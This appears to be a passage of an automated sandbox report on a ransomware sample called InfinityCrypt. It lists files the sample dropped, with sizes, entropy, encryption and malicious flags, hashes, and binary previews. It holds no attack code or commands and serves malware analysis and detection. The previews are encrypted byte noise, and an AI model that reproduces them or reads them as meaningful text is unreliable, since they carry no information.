                                                                                                        Preview:...<...[Z.....>,..@..[.<....2.-cx)(7. .l.....[.......Q.......^..F......y.F..*y[..|B..IM:..z.^m....#.K..Z..u.w.....h+....QBK..U...l..Z...).".B.....:..5}..*^..+T6...C_]f..P.T .`.g.L..y..%.}./..E.C$../<..8..4.BX~.G".*E*..`vR...b;....u.@.m......b...3...J..hR"/...........9.m.n.s7.......U.......[....{G"8.8...VD..)..!.@.[Q)........K....V.t...z...F....F.....PO...'.x>Er.....a3#A.j.xq...a....}.E.....7.8.!.C(U}.'.G.R.....!-..c.0....0mA/..E..i...x._E.C.!........0........B.......<.]........~N...#<..3.+r...<...S..+..Yd.UL1...g...6.w.&.blf.3.....{8RV...s...q.gn....2...C.5BUYcPQ.>..`...=..........cL.`?....=........yE-....]u..P..^.?.>....h.....2_...-+.M..KzW#..A=..{..0.a.:.....z..x5.;w...._.G1.n..ZZ.Og..R..=WD....@`..d.).k.~..~...7.|.X..8.f.!l~......W<Rq...&Vr`....R..+.....F...*&.yK...qv5.Q.l.;..b.4..j:..t..6.*......5rdSqG...c..6zas3....|xt...6...71...2.gu.G...*......W....d..._..i.(.N.>n...l.~..p.7...2/..L~.,.0....m...7.....NE...H.].!U...b........
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):169040
                                                                                                        Entropy (8bit):7.998905834204813
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:3072:DnU+jL3ptA+JWXw1VPfIA+Y8PV6Vn5IRNpIY6V8SsMRqnu4bIL:jU+5G+JWXwrPAA+PdM5sN+/RquF
                                                                                                        MD5:BF2997842C1E0AC68D6E76B00B4DBB40
                                                                                                        SHA1:A7DE9C36F4024421BFE880B7B75E213721319C35
                                                                                                        SHA-256:BC7C1D7EF8EAEE78F2A8C76F2F559F2820043E5ACAC2C40033D1E1EC43244E34
                                                                                                        SHA-512:4E5C558A5DD89FD681E7249CA66A6EC21601358D50A337BAAB72C8E3D9A859FA847AA0D0469617E69BA666CE3AC83AB73CB1C137616F7E2D40A89FB7994101ED
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:..}c.......g.P..9....r..v..W..`#.zfK.....*._.o...N,.qH..).l.;..+..W"0U...4..vIh....Z..D.!..J....._..(.*..7.0..x..A*.=...O.a..>50C.HM}*%....J.......T~.?..{.[.......TY(#8.[..5..z.9.Fb.,....>.WI.....9.e...r.#.r.$$m...{...P.|.....w.iC._.........y|_W,J.B.R..M9.0..)..M....C.m..4a.N.........g9(...7)[.W.H.@.ZF....A..H'..ZsK..\L\....ax[q|J.v:.b../)+.........N}..N..l.IC.[O..r..6%.+.".(.|`._.12.....@...5k...'.\5...W.3z......,....n.}:g..u........Y..XB...:.....7P(......-.W.. ..BJ|Np.'^....`...U.......M|...3...7.4..O..!;...h..`j....Sv._@l..Z...Q.t....RS g.N2......(.x.@.!...|0.l.(..f...O.+..^..X.. .L....dH...^..B.Q..j....Ks+|."....x....u.t.j....B..._\T...3.V.f.t..)u.p!UT.....7...Oc.P........-\..m^.A.`...}..9C...qmB.......M'....`.#L.....q...eEeYl#T.......9..%...r.:.j..^...a..a|>.p....5]..k.O.....6v....cf.7.......F?:..O...'......&c.U..?j)i..?..RN......<.G..C.g............./s .K.M..J1.Nl.b....n.Q.bO.xM.......+.:.......Z..a....I(...O.ro..I..C.^..~....Y
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):720
                                                                                                        Entropy (8bit):7.759097927670598
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:rvWSnTDJd4WU15hBqZodqx+jj3ue1Exh+bImfXVSLeHmGwWXnMBa/RW2b:bX3JdW15h6o0WvExhahfloeH7xjJWE
                                                                                                        MD5:8A7FAF24ED84748E21F4092428B2424E
                                                                                                        SHA1:63452C43D6F364BA0EB77073972AEFBB8B122156
                                                                                                        SHA-256:8A7C599C7A38D7DB4282835BD3B58914C2FFCD8B427809F3D01E9FFF509F603E
                                                                                                        SHA-512:8BACBB418F7672D8EC132661D476A5EF87781A8B738C075276FA9FBE02532B00FAA3E733368931DF27100BC43D29410CDF0C5C39827BE82773D1007530207F3C
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:i.YC..:..2.&o.x(y#.S......J......u...F...&g,.#.%GAx..LAZ..G.S....b..).#.........t:[@i...Z.F...a.......1..3..(Q.....<..xzq~...(..|..^.).5.-...[h........W.:6....?.D+.s.%>.`......a.....5,.VP.......g..E.KY(..0..;.:SL.*$k. .K.q...og.....[..@..ft.r.......L.s.......}Ym..m..i...J.-..}d5..:@T..D.FD.~.O-.d4\A...~A[...K,..b...5.l.......).?.....1......V.|..... ..`J...L...C(A7.XE1?......t..T .r_zc.7.Ug-...'.D5vmt^M.i....Rp.'9.H..y.B..^...<..O.1....f..a..).R.....>I..[.C...C.....D=.]..K[.?.QCnQx.E+.|.`}..'?....o......P...+0V]<~.K.decd.8.j.j...k./..B..r..A.-n..I...H..t^d.......<..Q..ho.j.S%2.kb..).."T...BJ.yZ.......Lq.!..........,y?8...k..f/...~..Mb..B.u....m.Y...0P.,.'..~..j.9Z'..@i..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):33776
                                                                                                        Entropy (8bit):7.995013417761031
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:768:kmsuYZSyAYmzBfwvj2CaOMDPH3R7qe+Ev3kdJylJ6RQ9tCtOw2f/:k5kyAYmzBwj1aOMLHA8Ud4b6GDCtO1
                                                                                                        MD5:418993B5135AFB86B397401B475D8476
                                                                                                        SHA1:5446FD683AB035F3611F1DD0815CA022DCB86EFF
                                                                                                        SHA-256:C60EFD856F03BA8297FC157A43CB623605F2B83B321C1D0D3CEE0F6A925044E7
                                                                                                        SHA-512:E5DB2D22317C37F909E50731519BFEE1FB0C04FE88646E85A158E323C9A92AD0B0617496DC31840C27192987090CAADDB551BD40AB90BD5EC94F1D69384AD10B
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:.*.....J>....l.$#....eW..J.. ..L......#X..-N~.|TC.$.....H="cIk..iT.J.X.2.....G<..Xe.>R..x.{..bs.......9..F..-"....7...c.b.|..5..c.~.[dA....,(J.x.}....../.e-.......)=..1...U.!.......M...y.>.I...<....'...v..wD4..:..*.i......t...c....)1.^ ..+.7lN.?...|:..o[Z....7.\._....Q.>D.o..........6......0..E.M...</..1\q\..Y/|.d46Fr........B...44e:.d..wI.~.'.Z...7}...OIT.1.V..U~.....-V..O..lsK.;..[......3.j.U'....=S.W..5.@|......$\...|.m...i5.y..s.5..hn]..9...os:..2q.<.....dnVS..K.......[..@.......d.....R...>...Uu..,ZC?.O...`.r....:~..p)..8..-...6.......9...$.....>...]...(.op.....V...=......d.s c..v..BA..........|B..W^..1.:.).y....6.=...E.....z.+.d6)...j=i."-WG..n..~.-..y5....D....9..*..cD..}.K...9)...z..!...je..V&..f....n.G.....I.9..,^..$...*]r..*'..uqJb.&.+E..'.......).xH...h...*.0x.g..S..a.'...:6..,.0...:.E.a...............J..d.v..M.5U.......e[.. .v.A+.Uy.Y.....VUa.}..1......u...."O.bv.lR.j.......+>.f.k.^...sU.l...miR9.Yi..........b...P9..4..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):33776
                                                                                                        Entropy (8bit):7.995013417761031
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:768:kmsuYZSyAYmzBfwvj2CaOMDPH3R7qe+Ev3kdJylJ6RQ9tCtOw2f/:k5kyAYmzBwj1aOMLHA8Ud4b6GDCtO1
                                                                                                        MD5:418993B5135AFB86B397401B475D8476
                                                                                                        SHA1:5446FD683AB035F3611F1DD0815CA022DCB86EFF
                                                                                                        SHA-256:C60EFD856F03BA8297FC157A43CB623605F2B83B321C1D0D3CEE0F6A925044E7
                                                                                                        SHA-512:E5DB2D22317C37F909E50731519BFEE1FB0C04FE88646E85A158E323C9A92AD0B0617496DC31840C27192987090CAADDB551BD40AB90BD5EC94F1D69384AD10B
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:.*.....J>....l.$#....eW..J.. ..L......#X..-N~.|TC.$.....H="cIk..iT.J.X.2.....G<..Xe.>R..x.{..bs.......9..F..-"....7...c.b.|..5..c.~.[dA....,(J.x.}....../.e-.......)=..1...U.!.......M...y.>.I...<....'...v..wD4..:..*.i......t...c....)1.^ ..+.7lN.?...|:..o[Z....7.\._....Q.>D.o..........6......0..E.M...</..1\q\..Y/|.d46Fr........B...44e:.d..wI.~.'.Z...7}...OIT.1.V..U~.....-V..O..lsK.;..[......3.j.U'....=S.W..5.@|......$\...|.m...i5.y..s.5..hn]..9...os:..2q.<.....dnVS..K.......[..@.......d.....R...>...Uu..,ZC?.O...`.r....:~..p)..8..-...6.......9...$.....>...]...(.op.....V...=......d.s c..v..BA..........|B..W^..1.:.).y....6.=...E.....z.+.d6)...j=i."-WG..n..~.-..y5....D....9..*..cD..}.K...9)...z..!...je..V&..f....n.G.....I.9..,^..$...*]r..*'..uqJb.&.+E..'.......).xH...h...*.0x.g..S..a.'...:6..,.0...:.E.a...............J..d.v..M.5U.......e[.. .v.A+.Uy.Y.....VUa.}..1......u...."O.bv.lR.j.......+>.f.k.^...sU.l...miR9.Yi..........b...P9..4..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):33776
                                                                                                        Entropy (8bit):7.995013417761031
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:768:kmsuYZSyAYmzBfwvj2CaOMDPH3R7qe+Ev3kdJylJ6RQ9tCtOw2f/:k5kyAYmzBwj1aOMLHA8Ud4b6GDCtO1
                                                                                                        MD5:418993B5135AFB86B397401B475D8476
                                                                                                        SHA1:5446FD683AB035F3611F1DD0815CA022DCB86EFF
                                                                                                        SHA-256:C60EFD856F03BA8297FC157A43CB623605F2B83B321C1D0D3CEE0F6A925044E7
                                                                                                        SHA-512:E5DB2D22317C37F909E50731519BFEE1FB0C04FE88646E85A158E323C9A92AD0B0617496DC31840C27192987090CAADDB551BD40AB90BD5EC94F1D69384AD10B
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:.*.....J>....l.$#....eW..J.. ..L......#X..-N~.|TC.$.....H="cIk..iT.J.X.2.....G<..Xe.>R..x.{..bs.......9..F..-"....7...c.b.|..5..c.~.[dA....,(J.x.}....../.e-.......)=..1...U.!.......M...y.>.I...<....'...v..wD4..:..*.i......t...c....)1.^ ..+.7lN.?...|:..o[Z....7.\._....Q.>D.o..........6......0..E.M...</..1\q\..Y/|.d46Fr........B...44e:.d..wI.~.'.Z...7}...OIT.1.V..U~.....-V..O..lsK.;..[......3.j.U'....=S.W..5.@|......$\...|.m...i5.y..s.5..hn]..9...os:..2q.<.....dnVS..K.......[..@.......d.....R...>...Uu..,ZC?.O...`.r....:~..p)..8..-...6.......9...$.....>...]...(.op.....V...=......d.s c..v..BA..........|B..W^..1.:.).y....6.=...E.....z.+.d6)...j=i."-WG..n..~.-..y5....D....9..*..cD..}.K...9)...z..!...je..V&..f....n.G.....I.9..,^..$...*]r..*'..uqJb.&.+E..'.......).xH...h...*.0x.g..S..a.'...:6..,.0...:.E.a...............J..d.v..M.5U.......e[.. .v.A+.Uy.Y.....VUa.}..1......u...."O.bv.lR.j.......+>.f.k.^...sU.l...miR9.Yi..........b...P9..4..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):33776
                                                                                                        Entropy (8bit):7.995013417761031
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:768:kmsuYZSyAYmzBfwvj2CaOMDPH3R7qe+Ev3kdJylJ6RQ9tCtOw2f/:k5kyAYmzBwj1aOMLHA8Ud4b6GDCtO1
                                                                                                        MD5:418993B5135AFB86B397401B475D8476
                                                                                                        SHA1:5446FD683AB035F3611F1DD0815CA022DCB86EFF
                                                                                                        SHA-256:C60EFD856F03BA8297FC157A43CB623605F2B83B321C1D0D3CEE0F6A925044E7
                                                                                                        SHA-512:E5DB2D22317C37F909E50731519BFEE1FB0C04FE88646E85A158E323C9A92AD0B0617496DC31840C27192987090CAADDB551BD40AB90BD5EC94F1D69384AD10B
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:.*.....J>....l.$#....eW..J.. ..L......#X..-N~.|TC.$.....H="cIk..iT.J.X.2.....G<..Xe.>R..x.{..bs.......9..F..-"....7...c.b.|..5..c.~.[dA....,(J.x.}....../.e-.......)=..1...U.!.......M...y.>.I...<....'...v..wD4..:..*.i......t...c....)1.^ ..+.7lN.?...|:..o[Z....7.\._....Q.>D.o..........6......0..E.M...</..1\q\..Y/|.d46Fr........B...44e:.d..wI.~.'.Z...7}...OIT.1.V..U~.....-V..O..lsK.;..[......3.j.U'....=S.W..5.@|......$\...|.m...i5.y..s.5..hn]..9...os:..2q.<.....dnVS..K.......[..@.......d.....R...>...Uu..,ZC?.O...`.r....:~..p)..8..-...6.......9...$.....>...]...(.op.....V...=......d.s c..v..BA..........|B..W^..1.:.).y....6.=...E.....z.+.d6)...j=i."-WG..n..~.-..y5....D....9..*..cD..}.K...9)...z..!...je..V&..f....n.G.....I.9..,^..$...*]r..*'..uqJb.&.+E..'.......).xH...h...*.0x.g..S..a.'...:6..,.0...:.E.a...............J..d.v..M.5U.......e[.. .v.A+.Uy.Y.....VUa.}..1......u...."O.bv.lR.j.......+>.f.k.^...sU.l...miR9.Yi..........b...P9..4..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):33776
                                                                                                        Entropy (8bit):7.995013417761031
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:768:kmsuYZSyAYmzBfwvj2CaOMDPH3R7qe+Ev3kdJylJ6RQ9tCtOw2f/:k5kyAYmzBwj1aOMLHA8Ud4b6GDCtO1
                                                                                                        MD5:418993B5135AFB86B397401B475D8476
                                                                                                        SHA1:5446FD683AB035F3611F1DD0815CA022DCB86EFF
                                                                                                        SHA-256:C60EFD856F03BA8297FC157A43CB623605F2B83B321C1D0D3CEE0F6A925044E7
                                                                                                        SHA-512:E5DB2D22317C37F909E50731519BFEE1FB0C04FE88646E85A158E323C9A92AD0B0617496DC31840C27192987090CAADDB551BD40AB90BD5EC94F1D69384AD10B
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:.*.....J>....l.$#....eW..J.. ..L......#X..-N~.|TC.$.....H="cIk..iT.J.X.2.....G<..Xe.>R..x.{..bs.......9..F..-"....7...c.b.|..5..c.~.[dA....,(J.x.}....../.e-.......)=..1...U.!.......M...y.>.I...<....'...v..wD4..:..*.i......t...c....)1.^ ..+.7lN.?...|:..o[Z....7.\._....Q.>D.o..........6......0..E.M...</..1\q\..Y/|.d46Fr........B...44e:.d..wI.~.'.Z...7}...OIT.1.V..U~.....-V..O..lsK.;..[......3.j.U'....=S.W..5.@|......$\...|.m...i5.y..s.5..hn]..9...os:..2q.<.....dnVS..K.......[..@.......d.....R...>...Uu..,ZC?.O...`.r....:~..p)..8..-...6.......9...$.....>...]...(.op.....V...=......d.s c..v..BA..........|B..W^..1.:.).y....6.=...E.....z.+.d6)...j=i."-WG..n..~.-..y5....D....9..*..cD..}.K...9)...z..!...je..V&..f....n.G.....I.9..,^..$...*]r..*'..uqJb.&.+E..'.......).xH...h...*.0x.g..S..a.'...:6..,.0...:.E.a...............J..d.v..M.5U.......e[.. .v.A+.Uy.Y.....VUa.}..1......u...."O.bv.lR.j.......+>.f.k.^...sU.l...miR9.Yi..........b...P9..4..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):832
                                                                                                        Entropy (8bit):7.761451148237035
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:edNXC1sxKjXm6UZ4mChIYC08a889QswCkn:excD7mN308a19bkn
                                                                                                        MD5:4AF20CE7FE2C95E753538E9173DD137F
                                                                                                        SHA1:BE809988D4AAC57084CB09598DA8D006E9D1AB8C
                                                                                                        SHA-256:2AAAB19FDC3E5334119194733A8BDC60985FDA929D2A5CB09482E7FD29F32DDD
                                                                                                        SHA-512:E091E58FAEFBA425AC6BB2BB112CAF878D332E4B0F6F33690873A9F0AE80CD62A2D4C15529ADA52E6B941F51F158D1E691C5842BFD3BD415FC408E7B36655E41
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:.Yv..u..(j..(..DF.DW..a.9$.U]..b0.....X.0.W.C...2/..L.p.e...n.\<r...Ev.......J.`.:;.......e&.6P+...c..._..C..*...%i%.!...:f.xq..._DX8p)..XoO..Q.....&......8...}n..X..uu....:.b....|......4.`.$g..d........V.q.6.4.Z.~.e..6.=!..0...'...D7f5..d....~y4........Oi.0..v.i.......$.~B.9L...w...y.<..?0.e|....zPr.(.......ea..w...G.=v.....>. ...;.N.....@..d...o..Z)...4......;.D.:...:.*....H<$=1d.f..w^.*..kX..^...??*..*q.T[.T!"..1...".qG.;I.uh...L..p....2.4....0.....?.J....6o.E.`2..1PA^"D..m.7.F.:.w.a...l.kX`.L....Z.J.K....!@...U=...9. ht..B:.O-.}.'.v.B..P%..ELDK.Q*.l.z<h.......?...v.D.......V.8.LL..shM..GF.',.U.c.:....iE....$..~.........V......l..R.q.e......7.e..K"5CP....B.k......D=. ....8..^.Av..y..a.S...O...d..7e.i'...!....3.:#..v.>..Mq.a.?..b....{p.8..Ru.dwU..w.8...+..;.46..y4L..c..+...R|G.A...].=
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):240
                                                                                                        Entropy (8bit):7.1791060518568806
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:MckbN3YHmXkWmIzp0OCD48LM1TTxZEE/qPWal2SCIKCfaM:MckbN3UgA04M1T1ABOBM
                                                                                                        MD5:EBC2594ECF55671912CA4262512FB4DF
                                                                                                        SHA1:13A8A83AFAD8C57302B40E00D01756D65D6D9FB2
                                                                                                        SHA-256:8D3B109AE11A4EC4067E5AFF34CFB3A2CAD03FD1E089FA90DA184DB352C10ADB
                                                                                                        SHA-512:25E7F06883942038D88985C5ABCA467D4FAAF96DDFDE473843B3164698728AEBDE47A73CFDB813FD0C067B4BEB220B583AE44131F334FEB6619B2AC284C714A6
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:....2<9......:.9x....+-.Ab..mF..pn..y..x......I..F..TJ.D..T....{.:+......Dd.F-......6.v~.ag.4<L.G..2.a.4QaO+#F.`R.;...7...k......" ..&.%...T...'_S....*...h6....o.!3.jK....c..@F...f...~.En.#.......yG.Q3J..n.....B..U'rg...l..z.z..?.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):624
                                                                                                        Entropy (8bit):7.695904128980152
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:xXK78e/9hbHrBlxxt4phGATsf+fA5b8QXgyYehYlZx75/8o9DgdpgYqEG1ml:xa78eVhvxrktsfTh34eOlZx7i0DgDIER
                                                                                                        MD5:B000CD4A763979F891DEB56875344AED
                                                                                                        SHA1:AD5E823F5B0F4E469E58A7F3FFA002537F28E717
                                                                                                        SHA-256:5A5DF6D2C518FDB0F1252EA089EB72C447103EAC7661AFEAD0873D78C8548ED9
                                                                                                        SHA-512:BB59CA4B125A989F97EC94931F2E1B78D33304EBDBCE31361512800349870C4D07C6685A0104338CD08E4E0FACD63241789BE25AAFE288A53459BA7246FC17E5
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:J...qb.......:2...i.68...p......=...3y......:.5x..i.+..g.j....k......Y`.....BJ.r f^.....".V....Q+z../...d.....v.3.T...?s.@..$c...w.@.c.9..U...8%..f.@...m.!..0.Ie.f..d".J...#..9..ND2..$.r..xJU[W...FwG......P...<.Q.j..3...9p..~..>.@..e.?.s.0.^lb...0..5...O{..-.........S^iP0.Fda.h+>li.-.g>..k..67.u...B..D...\L~W.U.o..s.N.9.W.;.v..$..cj..&.q....V...*D...p.b.D.........Z..>A"..,.b.|.s?..........v......_..*.v.&.M*;.4..^U>.;..om.E....)BN.ZKO.C`.~.....r~.g._...J......8A...& .$. `#...O...m..D.`..K..)..3]Q..........J.`_.\/.+$l..3.DB..*._.\.R........Z..............U..U..J......F...U
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):848
                                                                                                        Entropy (8bit):7.781818377555386
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:gDWSumu8Ublb6LSv0iRVNFcXPoRvNZKKMnrYcBFcg6yLoTvJ1XjW:G/umY5b6LSv0AFgPoL0KMnMcg5HTvXS
                                                                                                        MD5:863287970234FA196C27576C3B6989F9
                                                                                                        SHA1:942C1E678AD3E437E23F3C8876A016DE05A36C06
                                                                                                        SHA-256:764783F0DF60BEBA12D65EFC7BF87836C5A0E0A9782E6CA4671F6481F6F8A0AB
                                                                                                        SHA-512:F823F9BB472D2583935E8ABA5741385D600611024FC514A0BE5D13B488CA22BF1FC4D5D7CA5BF490CB9A772A1FF849BC16E46636D3E5F24DC94F29DE7216FEEF
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:.$..0.Z.p.0...X.....'.z...'.l. .,!.@eA(v....z...B.\.6.|...-.<q.z...F..p...8!H..(.<-W.'[.!...a0;....h."~...r...?.K.Q...*.4.."..2..~un[J.c4....t3.M-........O.D'.H.p..n..'. ~y.W..)aW1.&...P.$hM....WI}8..H....<...Cn1(.....(U......{..*.G.......2.7...].....KI...q........pl@+Bs./.p;.e......_.@(f..B.l...'.4..U]|..!([..........rgR.z+C......{...t.,4f.|_........La...j.@b8...G..FW`hLn.E>..|H.d6.a..|.....V..6.....u/.?4.....V(f.Vfdoy.#Kj..5.!s.1...pw*%;}.....*=.Q.............'.[.*..S....`:V.o...T./..V..h...........9.^.M"..tYr.....U..3..M..E$.....-.....5.`.9!..j..2.yv.4..O}.l.....!......=$...'...,.+-.....k.I..r .A......ed.e|8..0..L...YX7.}.&IXK..7...wf4.....J..:1;.../...=.O....MSF....Z..................j..I......W....5(...P.{".<.k.......Z...XG..s...rs.S...4..[.X...lD"...`.r.b.U..q.S..Vk..:T(.g1Gt<}.l\^...t
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):15794688
                                                                                                        Entropy (8bit):7.999989259949063
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:393216:rki9rvCfa52rohTJ7CRn13N17m2ALz0rBttEIuyHNy40W8:Aumfl8hTxkn13N1C2T9ELm8lW8
                                                                                                        MD5:A4FFD775375065243C3C7CDE8B9F9645
                                                                                                        SHA1:1EC73250A2F9D7C440B80EA2E493091208092FAF
                                                                                                        SHA-256:C3091EA871D16500BCB552ADCEA6FA32D39F2A41938D83BC245530ABE778B6BA
                                                                                                        SHA-512:6590BC065AC7DDA0441E3831B304E112D69D337DF77F5AECC2746DFAEE7E02F65C5B282CA48AE59AFAE8B93D55AA353FACBEB5B4D2D2417361A5C020074EE1B2
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:..}c.......g.P..9....r..v..W..`#.zfK.....*._. .!.L]>...,......Yn$.s....|...."..V ..d~....'E.Jx......#....V.t...!.|.x>"V}'....t]......i..A....H..T...X.g.m-.....j.w"...=...E..'.P....L.m.A...(...;...... .}......u.X..n.T_.%.'..h.X...9.F.W...&.m..$..N...1.....TG*..O..R.g...6C..Z........a...^q..Gz....nx.[7\hI....~VM'..Ks...H.iV...-..*...<-.sE..dV.............]....KO\.n....6..#......f.%.F.z~...5Juxx...l}....a}..>4Bn.'h..C.7...Um.f.KC.......... L].+.d$.z.?U.u..zb..z.Ku..x.w....L.F...%.M..k..R.{...S....'d..$w.aP..G.Qu.I..**.Q...:....np`...84....A`....Ye".Pa...|.(!...HM.g.?..22H.s.^[.......{V..u.l.F...J.}[...f._)b........r....O........DB2..H...C.Fu..U.o...".(.......e.....#....5!...X.Z.\/..D..i.J..iA.k.......Th.o..:.....&E..B.].mg*s!....D....{J.&..Q4.gX.....Q,J.3.q3..4.Y.......Yt..Q{.J..A.L....~..g.....&...,.+.aOM...e.g..Y..d...6.zR.n.............*.At....=|.mL......~.c).~...S.8..g..F"@.c.u....m..\..h..|E...J..u..W..JsJ._....9V.Q.9.jA
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14048
                                                                                                        Entropy (8bit):7.987542947412012
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:rMB9W9YY9Sr4r10GiaD4EVCBwSdIcjPfHP2NV:rFSs10GiGjh2fv2NV
                                                                                                        MD5:CF13A464A6D3FF08DD4D639C21A8944A
                                                                                                        SHA1:1092F6B08999455A5E72D245BCD3DFD81F2554A6
                                                                                                        SHA-256:0D205FDB90D4C2EE94C43EAF0F71A3029C007FCEF84C903071D68A0721296017
                                                                                                        SHA-512:897A587C2920F41D2F3D25BE145CCBCF1ADCD8DCD7A89AE5A2EC53B0CC0C3B9F9386014C01CD5E9611D71021C7CE792C3E6843AC41F243DFE6C9A41E6A2737B0
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:.<.q..!$'..../.TF..X.l..&...#...V6 .U..9..R.....G.V.Q..[.D.g.h../....^........J...A36.8Al..w0.....}..<....6.......:......!. .f..BQ...n...t.....+.}.g..7...6.1....*....r.x.g.Q..=....c..%....6...Dq....H3.B.o....sN..aj%..W...+.....MT.N......0..x)i.N.W....X..X.h...)>%.Z..I.#..6.@..$...7..x.?..Z.......a^.V...N.Q...9k~.s.-..#z./..H,...8sz.*R*3...F;.5.Y.|*.Q..../`+s..W_Jbuq..#f^.=....(.....6..f.4"U.......e..).J.Ew....r..L..5.^.....o..!q.m.....T..o......&."..437.zG.v./t+.....>..t<.sD..@.p.8...)..{...FV.q-[....0....O.a8.\.{.m.[fGpHL.,S....mC....U........T...T.xF..c.P....a........-.....C`..J.<Q........c..Q$..0...i...d.|../.f6.;No...Y...%.6Y...".. ..5t!.o<.).....V.a^b}Tc.gn&....]?.....qyG.K.R+uG.)....u!.)..H<..3...q.w.L-..-B.j[X...4.Q..........a.4...........D5.|4....px..0..iS/..F.....WC.*QP..........|v...DE.....rh....O....*.m.........P..........s`d...b..[+.9l..........ke-8.`. ..d..q..bj..rtO..7<ko3.y`>8o>M..H..ZMmZ.OR....%u.......+..~...Y...&@^.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1856
                                                                                                        Entropy (8bit):7.888446553658178
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:mrPmJaIpetRbkuTmX+NbbA4UElvn3DQMheeUbGq17cJnZ:mrOJnXuTNNQ4dzpsenCcH
                                                                                                        MD5:50678F3ECC70D8FF6386771988AC2150
                                                                                                        SHA1:DEEEB963DA559A329C6D40A9CFCC87116262FC6E
                                                                                                        SHA-256:F40D5D11EB972B35D7B3D5963B5BC95FA63EEA4C70508B34011FFE846BD8E409
                                                                                                        SHA-512:86B78299CD6CA8941A8F75FECAB04210C10AD191B37F63E041E57CE5D5869EDEE6459758A45B7CDAEAB26A6266939A31E3903E3D3504F0366A8E6DA353A8B0D4
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
